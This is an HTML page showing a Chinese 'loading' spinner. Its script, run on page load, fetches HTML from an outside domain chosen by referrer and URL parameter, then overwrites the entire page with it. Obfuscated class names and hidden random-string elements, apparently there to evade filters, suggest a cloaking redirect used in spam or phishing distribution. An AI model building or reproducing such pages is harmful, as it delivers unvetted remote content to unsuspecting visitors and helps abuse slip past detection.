<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RH9tQk2M {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RH9tQk2M .BBx4Dtf2qSC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RH9tQk2M .content {
            line-height: 50px;
            text-align: center
        }

        .RH9tQk2M .img {
            width: 100%
        }

        .RH9tQk2M .uu60JaEwzD {
            text-align: center
        }

        .RH9tQk2M .uu60JaEwzD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RH9tQk2M .uu60JaEwzD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RH9tQk2M .uu60JaEwzD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RH9tQk2M .uu60JaEwzD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RH9tQk2M .uu60JaEwzD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RH9tQk2M .uu60JaEwzD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RH9tQk2M .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TBbdpD06Bz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OPrIP = TBbdpD06Bz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OPrIP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OPrIP +".html?a=share";
		}
		
        N5jnaUkN=url+"#"+new Date().getTime();
        N5jnaUkN && function() {
            $.get(N5jnaUkN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >nnpTwqgD9DZ5bS0syHXCVnt97fY3hMGlUHdqtMXQLCKcSkSIApQAQ0BJaA2WrUS2wPYLA3AIfeazNtRIdgdhnXMIKy</li>
<div style='display:none'>TbepiSbz5X6Azm1DXop37B74aRjOheFU7dk8JHx</div>
<div style='display:none'>TbepiSbz5X6Azm1DXop37B74aRjOheFU7dk8JHx</div>
<ul style='display:none' >vbl3UIiBMy3GbasCVzkxHwww6C0Kx1F5P8tDc3m5WAX1EhGmrp9lXeYnSUf1Ty5Ay8c4FiwxtdvklLHtSttQrFeb</ul>
<p  style='display:none'>gWERPb9bwCWSYfENdjziipXP</p><div class="RH9tQk2M">
    <div class="BBx4Dtf2qSC">
        <div class="uu60JaEwzD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>vager4Gv7LJsM5ur9EO7EBwAC2uMRj7zqnDY</span>
<img  src='' style='display:none'>
<div style='display:none'>blS91ABUNaDFh6iFLUJ</div>
<h1 style='display:none' >obEwrogckEdaL0QMzHFI02mO5KsZmXOqtoHoYPQqZ</h1>
<img  src='' style='display:none'>
<ul style='display:none' >VbFLb2MRfGYEJIJoxuhCwk6s6ie8uROdvLycWoZJaWwrh4t0B1Sr1LWiOrSS30HAdtsDAkmCZAr68OO</ul></body>
</html>